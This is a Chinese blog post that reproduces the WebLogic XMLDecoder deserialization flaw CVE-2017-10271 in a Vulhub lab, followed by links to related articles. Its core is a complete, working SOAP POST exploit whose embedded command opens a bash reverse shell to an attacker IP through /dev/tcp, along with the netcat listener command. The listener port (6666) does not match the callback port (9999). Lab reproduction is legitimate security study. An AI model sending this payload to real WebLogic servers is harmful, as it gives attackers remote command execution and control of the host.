Vulhub-CVE-2017-10271复现

最新推荐文章于 2023-12-22 17:35:53 发布
最新推荐文章于 2023-12-22 17:35:53 发布
阅读量675 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62805300/article/details/125359808
版权

介绍

WebLogic XMLDecoder反序列化漏洞

WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击。

原理

 主要由wls-wsat.war触发该漏洞,触发漏洞url如下: http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType post数据包,通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。

复现步骤

访问该路径下的”/wls-wsat/CoordinatorPortType11“目录,如下图就说明存在漏洞

攻击机用端口6666开启nc监听 

nc -lnvp 6666

poc  改host加端口

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.43.53:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.43.248/9999 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

反弹shell

 

R0ck3t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic漏洞复现
weixin_52374319的博客
06-21 582
4、查看ldap服务器,成功反弹shell。3、执行exp获取反弹shell。
weblogic反序列化漏洞补丁3
09-11
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
weblogic中间件漏洞总结
weixin_42345596的博客
08-14 3262
一.weblogic简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic Se
weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
YouthBelief的博客
11-01 7628
weblogic wls-wsat组件远程命令执行(CVE-2017-3506) 前言 与weblogic 反序列化(CVE-2017-10271)类似 一般情况下weblogic会开放7001以及7002端口 0x01 漏洞描述 wls-wsat组件远程命令执行 如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞 /wls-wsat/CoordinatorPortType11 0x02 影响范围 OracleWebLogic Server10.3.6.
weblogic 反序列化(CVE-2017-10271
YouthBelief的博客
11-01 1201
weblogic 反序列化(CVE-2017-10271) 0x01 漏洞描述 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 7001端口 0x02 环境搭建 vulfocus靶场 目录wls-wsat/CoordinatorPortType 如果访问/wls-wsat/CoordinatorPort
Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271
qq_42430287的博客
12-22 1285
2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。在 Red Ha
vulhub漏洞复现 CVE-2016-3088
最新发布
03-14
vulhub漏洞复现 CVE-2016-3088
CVE-2018-18778.docx
07-23
首先,进入Vulhub的`mini_httpd/CVE-2018-18778`目录,然后运行`docker-compose up -d`命令启动mini_httpd 1.29的容器。成功启动后,服务器将在`http://192.168.50.93:8080`上提供服务。此时,可以通过访问这个地址...
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
关于禁用weblogic wls-wsat组件的步骤说明
09-03
WebLogic WLS组件漏洞,文档描述如何通过禁用组件的方式来修补漏洞
Weblogic wls-wsat反序列化漏洞修复
skyfans的博客
03-09 8818
文章目录在于使用中间件的安全性方面,不进行处理的weblogic中间件会存在wls-wsat组件存在反序列化漏洞,利用该漏洞可执行系统命令,获取操作系统控制权限,特出此文档。因考虑到weblogic最新版本也在此漏洞范围之内,无法解决此漏洞,而将wls-wsat组件包删除后对系统无影响,所以此文档临时将漏洞组件包删除,实现漏洞的修复。1.验证漏洞是否存在2.修复步骤2.1停止服务2.2删除wls-...
WebLogic WLS组件漏洞复现
张无忌_蜘蛛侠的博客
01-11 6491
WebLogic WLS组件漏洞复现
中间件漏洞 -- Weblogic
weixin_44769042的博客
11-19 1542
中间件漏洞记录--6 目录 一、Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) 1、环境搭建 2、访问 3、手工检验利用漏洞 1> 访问 http://ip:7001/wls-wsat/CoordinatorPortType 2> 抓一个上面那个包,并改成POST传参 3> 利用POST传参,构造XML 反弹shell 代码 4> 提前监听,getshell 5> 还可以.
weblogic中间件漏洞汇总
混子
11-24 8840
目录一、weblogic是什么?二、安装环境1、下载weblogic2、安装(其实就是点点点啦)三、反序列化漏洞1、XMLDecoder(CVE-2017-102712、XMLDecoder (CVE-2017-35063、wls-wsat远程代码执行(CVE-2019-27254、T3协议命令执行(CVE-2018-26285、 IIOP(CVE-2020-2551四、SSRF1、SSRF(CVE-2014-42102. SSRF联动Redis3、防御五、未授权访问1、Console HTTP协议远程代码
渗透测试面试题总结
热门推荐
0x536d72的博客
11-25 3万+
渗透测试常见面试题
weblogic目录总结以及getshell
qq_45300786的博客
08-24 2164
之前都是工具一键getshell,没有仔细研究weblogic,这次手动payload的时候,遇到点问题,就稍微研究了一下。 发现访问目标是war包+文件名 http://192.168.100.80:7001/wls-wsat/test.jsp 但是上传的时候却是war包+随机生成的目录值+war+文件名 wls-wsat/54p17w/war/test.jsp 以下是楼主分析 结论一 结论二 ...
vulhub复现CVE-2022-22947
10-13
复现CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin 5.6.4环境。 2. 使用工具生成特制的HTTP请求,其中包含恶意代码。 3. 将HTTP请求发送给vBulletin服务器,即可触发漏洞。 4. 漏洞触发后,攻击者可以在服务器上执行任意代码,获取敏感信息等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值